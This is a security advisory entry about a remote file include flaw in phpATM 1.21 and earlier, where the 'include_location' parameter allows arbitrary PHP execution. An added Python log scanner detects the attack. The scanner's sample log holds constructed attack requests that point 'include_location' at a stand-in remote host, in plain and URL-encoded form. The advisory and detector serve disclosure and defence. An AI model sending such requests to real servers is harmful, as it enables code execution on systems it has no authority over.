(7) HIGH: phpATM Remote File Include Vulnerability
phpATM version 1.21 and earlier
Description: phpATM software provides file upload and download functions
for web servers. This software contains a file include vulnerability. An
attacker can pass a PHP file location to the "include_location"
parameter and execute arbitrary PHP code on the web server running
phpATM. This flaw has reportedly been exploited in the wild.
Status: phpATM has released version 1.30 that fixes the issue.
Council Site Actions: The affected software and/or configuration is not
in production or widespread use, or is not officially supported at any
of the council sites. They reported that no action was necessary.
Posting by Ingvar
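
Since the flaw has reportedly been exploited in the wild, the following added example (not part of the advisory and not phpATM code) shows one way to review web server access logs for requests that set "include_location" to a remote location. It assumes common/combined log format; the request paths, hosts and log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

PARAM = "include_location"  # parameter named in the advisory
# Common/combined log format: client ident user [time] "METHOD target PROTO" status
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')
# A value naming a remote resource: scheme://host or protocol-relative //host
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:)?//', re.IGNORECASE)


def remote_include_values(target):
    """Return include_location values in a request target that point off-host."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        # parse_qsl decodes once; decode a second time so that
        # double-encoded values are flagged as well (conservative choice).
        decoded = unquote(value)
        if name == PARAM and REMOTE_RE.match(decoded):
            hits.append(decoded)
    return hits


def scan(lines):
    """Return (client, status, value) for every flagged access-log line."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable request line
        client, _method, target, status = m.groups()
        for value in remote_include_values(target):
            findings.append((client, int(status), value))
    return findings


# Constructed sample log lines (documentation addresses, .invalid hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /phpatm/index.php?action=list HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /phpatm/index.php?include_location=http://files.example.invalid/a.txt HTTP/1.1" 200 312',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /phpatm/index.php?include_location=HTTP%3A%2F%2Ffiles.example.invalid%2Fa.txt HTTP/1.1" 404 210',
    '203.0.113.4 - - [01/Jan/2024:10:01:00 +0000] "GET /phpatm/index.php?include_location=include/ HTTP/1.1" 200 4000',
]

if __name__ == "__main__":
    for client, status, value in scan(SAMPLE_LOG):
        print(f"{client} status={status} include_location={value}")
```

Only the request line is inspected, so a value sent in a POST body would not appear in an access log. A flagged request that returned 200 on a host still running version 1.21 or earlier is the case to investigate first.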